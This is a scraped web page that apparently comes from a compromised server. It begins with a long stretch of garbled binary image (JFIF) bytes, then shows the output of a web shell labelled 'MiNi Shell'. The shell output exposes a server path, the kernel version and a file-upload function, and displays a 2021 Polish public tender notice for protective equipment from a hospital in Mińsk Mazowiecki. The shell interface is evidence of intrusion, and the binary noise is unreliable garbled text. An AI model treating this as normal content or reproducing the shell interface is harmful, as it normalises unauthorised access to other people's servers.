JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210512/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210512/0005247201-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00052472 z dnia 2021-05-12</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa środków ochrony osobistej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Samodzielny Publiczny Zespół Opieki Zdrowotnej w Mińsku Mazowieckim</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 712351100</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Szpitalna 37</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Mińsk Mazowiecki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">spzozmm@spzozmm.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://spzozmm.bip.net.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Samodzielny Publiczny Zespół Opieki Zdrowotnej </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa środków ochrony osobistej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a02f6822-b249-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00052472</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://spzozmm.bip.net.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://spzozmm.bip.net.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">zgodnie z pkt VIII SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">6. Postanowienia dotyczące przetwarzania danychosobowych:1) Zamawiający informuję, że dane osobowe pozyskane w związku z przeprowadzeniemniniejszegopostępowania przetwarzane będą na podstawie art. 6 ust. 1 lit. c RozporządzeniaParlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osóbfizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takichdanych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L119 z 04.05.2016, str. 1), dalej "Rozporządzenie RODO" w celu związanym z postępowaniem oudzielenie zamówienia publicznego2) Administratorem danych osobowych jest Zamawiający. Podstawąprawną przetwarzania danychosobowych stanowi ustawa Prawo zamówień publicznych wydane na jejpodstawie akty wykonawcze, a także ustawa o narodowym zasobie archiwalnym i archiwach.Inspektorem ochrony danych osobowych jest Czesław Mazek tel. 25 506 51 81,czeslaw.mazek@spzozmm.pl3) Dane osobowe będą przetwarzane, z uwzględnieniem przepisówprawa, w celu:a) przeprowadzenie postępowania o udzielenie zamówienia publicznego,b) zawarcia irealizacji umowy z wyłonionym w niniejszym postępowaniu wykonawcą,c) dokonania rozliczenia ipłatności związanych z realizacją umowy,d) przeprowadzenie ewentualnych postępowań kontrolnych i /lub audytu przez komórki Zamawiającego i inne uprawnione podmioty,e) udostępnienie dokumentacjipostępowania i zawartej umowy jako informacji publicznej,f) archiwizacji postępowania.4) Daneosobowe będą ujawniane wykonawcom oraz wszystkim zainteresowanym.5) Dane osobowe będąprzechowywane przez okres obowiązywania umowy a następnie przez okresco najmniej 5 lat zgodniez przepisami dotyczącymi archiwizacji. Dotyczy to wszystkich uczestników postępowania.6) Osobie,której dane dotyczą przysługuje na warunkach określonych w przepisach RozporządzeniaRODO:a)prawo dostępu do danych (art. 15),b) prawo sprostowania danych (art. 16),c) prawo do usunięcia danych (art. 17),d) prawo do ograniczenia przetwarzania danych (art. 18).e) prawo wniesienia skargi doorganu nadzorczego.7) Osobie, której dane dotyczą nie przysługuje:a) prawo do usunięcia danychosobowych, "prawo do bycia zapomnianym" w związku z art. 17 ust. 3 lit. b, d lub e RozporządzeniaRODO,b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RozporządzeniaRODO,c) prawo sprzeciwu, o którym mowa w art. 21 Rozporządzenia RODO,8) Podanie danych jestdobrowolne, jednakże ich niepodanie może uniemożliwić Zamawiającemudokonanie oceny spełnianiawarunków udziału w postępowaniu oraz zdolności wykonawcy do należytego wykonania zamówienia,co skutkować może wykluczeniem wykonawcy z postępowania lub odrzuceniem jego oferty.9)Wystąpienie z żądaniem o którym mowa w pkt. 6 lub 7, nie ogranicza przetwarzania danychosobowychdo czasu zakończenia niniejszego postępowania. Zamawiający może żądać od osoby, której danedotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, wszczególności podania nazwy lub daty postępowania lub umowy.10) Wykonawca pozyskując daneosobowe na potrzeby sporządzenia oferty zobowiązany jest wypełnić obowiązki wynikające m. in. z art13 i 14 Rozporządzenia RODO. Wykonawca składając ofertę składa oświadczenie dotycząceprzetwarzania danych osobowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">11/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa środków ochrony osobistej, których wykaz zawarty jest w załączniku nr 5 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">18143000-3 - Akcesoria ochronne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1. W trakcie obowiązywania umowy Odbiorca może skorzystać z prawa opcji obejmującegoprawo zwiększenia do 20% ilości w każdej z pozycji asortymentowych wskazanych w formularzuasortymentowo-cenowym (załącznik nr 1) - po cenach jednostkowych wskazanych w tymformularzu. W przypadku, gdy 20% w danej pozycji daje w wyniku ułamek, ilość objętą opcjązaokrągla się w dół do liczby całkowitej. W przypadku nieskorzystania przez Odbiorcę z prawaopcji, albo w przypadku skorzystania w niepełnym zakresie, Dostawcy nie będą przysługiwałyżadne roszczenia.2. Odbiorca może skorzystać z prawa opcji w przypadku wyczerpania zakresupodstawowego dostawy w danej pozycji, jeśli pojawi się potrzeba zwiększenia zakresu tejdostawy. W takiej sytuacji. Odbiorca poinformuje Dostawcę o skorzystaniu z prawa opcji. 3.Dostawca oświadcza, że nie będzie dochodził od Odbiorcy żadnych roszczeń w przypadkunieskorzystania przez Odbiorcę z prawa opcji. 4. Do asortymentu dostarczonego w ramachskorzystania z prawa opcji zastosowanie mają wszystkie postanowienia niniejszej umowy. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy oraz okresu realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunki udziału w postępowaniu dotyczą: zdolności technicznej lub zawodowej,Wymagane jestspełnienie minimalnych warunków dotyczących wykształcenia, kwalifikacji zawodowych,doświadczenia, potencjału technicznego wykonawcy lub osób skierowanych przez wykonawcędo realizacji zamówienia, umożliwiające realizację zamówienia na odpowiednim poziomiejakości – tj. złożenie aktualnych kart technicznych / ulotek potwierdzających właściwościoferowanego produktu oraz próbek oferowanego asortymentu potwierdzających zgodnośćzaoferowanego przedmiotu zamówienia z jego opisem w ilości 1 sztuka z każdej pozycjiformularza asortymentowego, z oznakowaniem której pozycji dotyczą. Próbki nie ulegajązwrotowi. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tejsamej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji ikonsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę,ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia oprzynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymiprzygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniuniezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej;2) oświadczeniawykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Warunki udziału w postępowaniu dotyczą: zdolności technicznej lub zawodowej,Wymagane jest spełnienie minimalnych warunków dotyczących wykształcenia, kwalifikacji zawodowych,doświadczenia, potencjału technicznego wykonawcy lub osób skierowanych przez wykonawcę do realizacji zamówienia, umożliwiające realizację zamówienia na odpowiednim poziomie jakości – tj. złożenie aktualnych kart technicznych / ulotek potwierdzających właściwości oferowanego produktu oraz próbek oferowanego asortymentu potwierdzających zgodność za oferowanego przedmiotu zamówienia z jego opisem w ilości 1 sztuka z każdej pozycji formularza asortymentowego, z oznakowaniem której pozycji dotyczą. Próbki nie ulegają zwrotowi..</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę2) Oświadczenie Wykonawcyo spełnieniu warunków udziału w postępowaniu oraz o nie podleganiu wykluczeniu - wypełnionei podpisane przez wykonawcę. Oświadczenie to stanowi dowód potwierdzający brak podstawwykluczenia, spełnianie warunków udziału w postępowaniu odpowiednio na dzień składaniaofert, stanowi dowód tymczasowo zastępujący wymagane przez zamawiającego podmiotoweśrodki dowodowe.3) Dokument, o którym mowa w pkt. VI.3. ppkt. 3) (zobowiązanie podmiotuudostępniającego zasoby) jeżeli Wykonawca w celu potwierdzenia spełniania warunków udziałuw postępowaniu polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowejlub ekonomicznej innych podmiotów.4) W przypadku wspólnego ubiegania się o zamówienieprzez wykonawców, oświadczenie, o którym mowa w pkt 2 składa każdy z Wykonawców wzakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału wpostępowaniu.5) Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotówudostępniającychzasoby, przedstawia, wraz z własnym oświadczeniem, o którym mowa w pkt 2,także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstawwykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu wzakresie, w jakimwykonawca powołuje się na jego zasoby.6) Formularz cenowy - wypełniony ipodpisany przez wykonawcę9) Oświadczenie O rejestracji oferowanych produktów Do obrotu naterenie Rzeczpospolitej Polskie <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Odbiorca dopuszcza zmianę wysokości wynagrodzenia w przypadku: a) Zmianyobowiązującej stawki VAT, jeśli zmiana stawki VAT będzie powodować: – Zwiększenie kosztówwykonania Umowy po stronie Dostawcy, Odbiorca dopuszcza możliwość zwiększeniawynagrodzenia o kwotę równą różnicy w kwocie podatku VAT zapłaconego przez Dostawcę, –Zmniejszenie kosztów wykonania Umowy po stronie Dostawcy, Dostawca dopuszcza możliwośćzmniejszenia wynagrodzenia o kwotę stanowiącą różnicę kwoty podatku VAT do zapłaceniaprzez Dostawcę, 2. W przypadku zmiany wynagrodzenia na wniosek Dostawcy, jest onzobowiązany przedstawić Odbiorcy sposób i podstawę wyliczenia oraz dokumenty uzasadniające zmianę wynagrodzenia.3. Zamawiający rozpatrując wniosek Dostawcy o zmianęwynagrodzenia może zaakceptować wniosek, odrzucić wniosek lub zaproponować podjęcienegocjacji treści umowy w zakresie wnioskowanej zmiany.1. Jeżeli Umowa nie stanowi inaczejzmiany jej postanowień wymagają formy pisemnej pod rygorem ich nieważności. 2.Niedopuszczalne są istotne zmiany postanowień Umowy za wyjątkiem zmian przewidzianych wUmowie i w przypadkach określonych w p.z.p (art. 455 p.z.p.). 3. Określa się następującedopuszczalne zmiany istotnych postanowień Umowy: 1) w zakresie zmiany Strony Umowy wprzypadku, gdy Dostawcę ma zastąpić inny dostawca, co jest następstwem zmianwłasnościowych w organizacji Dostawcy (podział, restrukturyzacja, upadłość, etc.). Zmiana takajest dopuszczalna jeśli dostawca zastępujący dotychczasowego Dostawcę spełnia warunkiudziału w postępowaniu, na podstawie którego udzielono zamówienia i nie zachodzą wobecniego podstawy wykluczenia w zakresie analogicznym do Dostawcy, co więcej, ww. zmianapodmiotu nie pociąga za sobą innych istotnych zmian treści Umowy; 2) W oparciu o art. 455 ust.1 pkt. 1 ustawy – Prawo zamówień publicznych, Odbiorca dopuszcza zmianę postanowieńniniejszej umowy, w przypadku:a) zmiany oferowanego produktu, z zastrzeżeniem, że zmiana tanastąpi w przypadku, gdy dany produkt został wycofany z dystrybucji i został zastąpionyproduktem należącym do tej samej linii produktowej, o parametrach co najmniej takich jak modeloferowany, lub który został udoskonalony albo dodatkowo wyposażony, za cenę nie wyższą odustalonej w Umowie, b) zmiany oferowanego produktu, gdy produkt został wycofany zdystrybucji i nie został zastąpiony przez producenta produktem należącym do tej samej liniiproduktowej, zmiany oferowanego produktu, na urządzenie posiadające co najmniej parametrytakie jak produkt oferowany i z punktu widzenia technicznego lub technologicznego zapewniauzyskanie korzystnej dla Odbiorcy funkcjonalności lub lepszych parametrów pracy, za cenę niewyższą od ustalonej w umowie,c) zmiany terminu realizacji dostawy lub innych prac z przyczynniezależnych od Dostawcy, przy czym zmiana taka nie wpływa na jednostkowe ceny wskazanew ofercied) zmiana danych Odbiorcy lub Dostawcy (np. adres siedziby, zmiana formy prawnej),a także zmiany organizacyjnej Dostawcy, ale wyłącznie takiej, która nie powoduje likwidacjiDostawcy. e) zmian podwykonawców jeśli zmiana albo rezygnacja podwykonawcy;f) innychsytuacji, których nie można było przewidzieć w chwili zawarcia umowy i mających charakterzmian nieistotnych tj. nieodnoszących się do kwestii, które podlegały ocenie podczas wyboruDostawcy i takich, które, gdyby były znane w momencie wszczęcia procedury mającej na celuwybór Dostawcy, nie miałyby wpływu na udział większej ilości podmiotów zainteresowanych tąprocedurą.Wszelkie zmiany wymagają formy pisemnej pod rygorem nieważności, w postacianeksu do umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-05-20 13:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">miniPortal</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-05-20 13:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-12 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com